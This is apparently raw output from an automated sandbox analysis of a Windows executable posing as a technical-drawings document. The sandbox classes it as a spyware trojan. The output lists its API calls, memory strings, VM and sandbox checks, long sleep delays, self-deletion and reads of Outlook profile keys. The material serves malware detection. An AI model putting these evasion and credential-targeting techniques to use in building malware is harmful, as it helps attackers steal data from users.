Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017EA710 NtOpenProcessToken, 4_2_017EA710
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9670 NtQueryInformationProcess, 4_2_017E9670
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9650 NtQueryValueKey, 4_2_017E9650
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9610 NtEnumerateValueKey, 4_2_017E9610
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E96D0 NtCreateKey, 4_2_017E96D0
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263993924.00000000029B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000000.00000000.238895450.00000000004C6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000000.00000002.276069305.00000000070C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDoncepre.dll@ vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000000.00000002.275768947.0000000006F70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000004.00000003.261218393.0000000001562000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe, 00000004.00000003.263343456.0000000001702000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe Binary or memory string: OriginalFilenameFileSh.exeB vs Technical Specifications & Drawings.exe
Source: Technical Specifications & Drawings.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Technical Specifications & Drawings.exe Virustotal: Detection: 32%
Source: Technical Specifications & Drawings.exe ReversingLabs: Detection: 21%
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe "C:\Users\user\Desktop\Technical Specifications & Drawings.exe"
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process created: C:\Users\user\Desktop\Technical Specifications & Drawings.exe C:\Users\user\Desktop\Technical Specifications & Drawings.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Technical Specifications & Drawings.exe.log
Source: C:\Windows\SysWOW64\control.exe File created: C:\Users\user\AppData\Local\Temp\207G7-97P
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/2@14/6
Source: Technical Specifications & Drawings.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Technical Specifications & Drawings.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Technical Specifications & Drawings.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: Technical Specifications & Drawings.exe, ProcExpGUI/Form1.cs .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Technical Specifications & Drawings.exe.400000.0.unpack, ProcExpGUI/Form1.cs .Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 0_2_028EEFEA pushad ; retf 0_2_028EEFF1
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 0_2_028EF78A pushad ; iretd 0_2_028EF791
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017FD0D1 push ecx; ret 4_2_017FD0E4
Source: initial sample Static PE information: section name: .text entropy: 7.780783068719605

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\control.exe File deleted: c:\users\user\desktop\technical specifications & drawings.exe
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR
Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: Technical Specifications & Drawings.exe, 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 6116 Thread sleep time: -45877s >= -30000s
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe TID: 3116 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 1972 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01875BA5 rdtsc 4_2_01875BA5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe API coverage: 4.0 %
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Thread delayed: delay time: 45877
Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
Source: explorer.exe, 00000005.00000000.309044837.0000000008476000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: lume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.320624186.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 00000005.00000000.320680950.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: explorer.exe, 00000005.00000000.327010240.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 00000005.00000000.323194447.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 00000005.00000000.330711449.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000005.00000000.306843353.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.286686271.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: Technical Specifications & Drawings.exe, 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AB171 mov eax, dword ptr fs:[00000030h] 4_2_017AB171
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA309 mov eax, dword ptr fs:[00000030h] 4_2_017CA309
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CDBE9 mov eax, dword ptr fs:[00000030h] 4_2_017CDBE9
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186131B mov eax, dword ptr fs:[00000030h] 4_2_0186131B
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h] 4_2_017D03E2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h] 4_2_017D03E2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h] 4_2_017D03E2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h] 4_2_017D03E2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h] 4_2_017D03E2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D03E2 mov eax, dword ptr fs:[00000030h] 4_2_017D03E2
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h] 4_2_017D4BAD
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h] 4_2_017D4BAD
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D4BAD mov eax, dword ptr fs:[00000030h] 4_2_017D4BAD
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01878B58 mov eax, dword ptr fs:[00000030h] 4_2_01878B58
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2397 mov eax, dword ptr fs:[00000030h] 4_2_017D2397
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DB390 mov eax, dword ptr fs:[00000030h] 4_2_017DB390
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B1B8F mov eax, dword ptr fs:[00000030h] 4_2_017B1B8F
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B1B8F mov eax, dword ptr fs:[00000030h] 4_2_017B1B8F
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E927A mov eax, dword ptr fs:[00000030h] 4_2_017E927A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h] 4_2_017A9240
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h] 4_2_017A9240
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h] 4_2_017A9240
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A9240 mov eax, dword ptr fs:[00000030h] 4_2_017A9240
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E4A2C mov eax, dword ptr fs:[00000030h] 4_2_017E4A2C
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E4A2C mov eax, dword ptr fs:[00000030h] 4_2_017E4A2C
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h] 4_2_017CA229
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h] 4_2_017CA229
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h] 4_2_017CA229
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h] 4_2_017CA229
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h] 4_2_017CA229
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h] 4_2_017CA229
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h] 4_2_017CA229
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h] 4_2_017CA229
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017CA229 mov eax, dword ptr fs:[00000030h] 4_2_017CA229
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017C3A1C mov eax, dword ptr fs:[00000030h] 4_2_017C3A1C
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01864AEF mov eax, dword ptr fs:[00000030h] 4_2_01864AEF
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h] 4_2_017A5210
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A5210 mov ecx, dword ptr fs:[00000030h] 4_2_017A5210
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h] 4_2_017A5210
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A5210 mov eax, dword ptr fs:[00000030h] 4_2_017A5210
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AAA16 mov eax, dword ptr fs:[00000030h] 4_2_017AAA16
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017AAA16 mov eax, dword ptr fs:[00000030h] 4_2_017AAA16
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017B8A0A mov eax, dword ptr fs:[00000030h] 4_2_017B8A0A
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h] 4_2_0186AA16
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186AA16 mov eax, dword ptr fs:[00000030h] 4_2_0186AA16
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2AE4 mov eax, dword ptr fs:[00000030h] 4_2_017D2AE4
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017D2ACB mov eax, dword ptr fs:[00000030h] 4_2_017D2ACB
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017BAAB0 mov eax, dword ptr fs:[00000030h] 4_2_017BAAB0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017BAAB0 mov eax, dword ptr fs:[00000030h] 4_2_017BAAB0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017DFAB0 mov eax, dword ptr fs:[00000030h] 4_2_017DFAB0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0186EA55 mov eax, dword ptr fs:[00000030h] 4_2_0186EA55
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01834257 mov eax, dword ptr fs:[00000030h] 4_2_01834257
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h] 4_2_017A52A5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h] 4_2_017A52A5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h] 4_2_017A52A5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h] 4_2_017A52A5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017A52A5 mov eax, dword ptr fs:[00000030h] 4_2_017A52A5
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0185B260 mov eax, dword ptr fs:[00000030h] 4_2_0185B260
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_0185B260 mov eax, dword ptr fs:[00000030h] 4_2_0185B260
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_01878A62 mov eax, dword ptr fs:[00000030h] 4_2_01878A62
